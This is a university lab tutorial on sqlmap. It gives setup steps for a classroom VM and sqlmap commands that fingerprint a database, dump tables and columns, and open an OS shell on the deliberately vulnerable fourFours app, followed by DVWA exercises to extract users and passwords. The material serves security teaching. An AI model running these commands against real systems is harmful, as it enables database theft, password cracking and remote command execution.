Note: if you just want to use the tool, take a look at the examples here and just use this reference for basic usage of the tool
Overview
SQLMAP is an open source penetration testing tool writted in python to detect and exploit SQL Injection flaws.
It works for all modern databases including mysql, postgresql, oracle, microsoft sql server, etc
SQL Injection is an injection flaw where user input could alter the SQL query being constructed and executed by the application.
SQLMAP automates common SQL injection techniques like:
Details about the different sql injection techniques automated by SQLMAP can be found here: sqlInjectionTechniques.html
Use Cases
For attacker
Attackers can use the tool to get into a database, and potentially the server!
Sqlmap is capable of providing a sql shell into the database - allowing an attacker to potentially execute any arbitrary sql command.
Moreover, sqlmap also has an option to provide the attacker with an OS shell, with which the attacker can execute any arbitrary OS commands! (Sql Injection leading to Command Injection!)
Sqlmap will also try to crack user passwords when it finds hashes, using dictionary attacks - so attackers can even use this tool to get your passwords!
For defender
Defenders can use sqlmap for penetration testing of their web applications, servers, and databases.
Use the tool to crack week passwords, assess whether the database is run with restrictive privileges, and to detect any potential injection holes in the application
Options
Sqlmap is a command line tool, and just like any other unix utility, one can find all the options they need to know by simply invoking the -h flag. i.e sqlmap -h, which will display all the options the tool accepts.
Essentially, to use sqlmap, all you need to know is the url of the target web application along with the parameters to target for injection. Here are the most common options to remember for using sqlmap:
To fingerprint a database: sqlmap -u “URL?name=value" --data=“name=&name=value” --cookie=“name=value“ -f
All the demonstration are within a custom VM accesible by all students on dh2020pc00 machine.
Grab a copy of CustomUbuntu804Server.zip from /virtual/injection/ directory on the dh2020pc00 machine.
Ex: scp $USER@dh2020pc00.utm.utoronto.ca:/virtual/injection/CustomUbuntu804Server.zip /virtual/$USER cd /virtual/$USER unzip CustomUbuntu804Server.zip
Run Vmplayer, open a VM you just unzipped, USE Nat or VMNET8 for Network Adapter setting
Login with username root and password password
Note down the ipaddress shown (/sbin/ifconfig should show you the ip address if you missed it).
We will refer to $ipaddress as the ipaddress that showed up for you, for the subsequent steps.
Tutorial
Sqlmap has been installed on the custom VM that you just setup.
from terminal sqlmap -h will show the options of sqlmap.
The following tutorial uses the very vulnerably fourFours application accessible on the browser at $ipaddress/fourFours
Fingerprint the database and server hosting fourFours using sqlmap:
sqlmap -u 127.0.0.1/fourFours/index.php --data="user=&password=&operation=login"
Get all tables of public database:
sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --tables -D public
Get all columns and data of fourfouruser table from public database:
sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --columns -D public -T fourfoursuser
Prompt to get an OS Shell! sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --os-shell
Exercises
Damn Vulnerable Web App, a common web application used to teach / learn about injection flaws has also been installed on the VM. THe web app can be accessed at $ipaddress/dvwa and login is admin / password.
Login to damn vulnerable web application, go to $ipaddress/dvwa/vulnerabilities/sqli for the sample sql injection application, and use sqlmap to solve the following tasks:
Discover the type of database used by the application
Determine the Current user, hostname, whether or not the current user is an admin, and the current database
Get user, passwords, roles and privileges from the database
Enumerate all the tables in the database, then get all the columns as well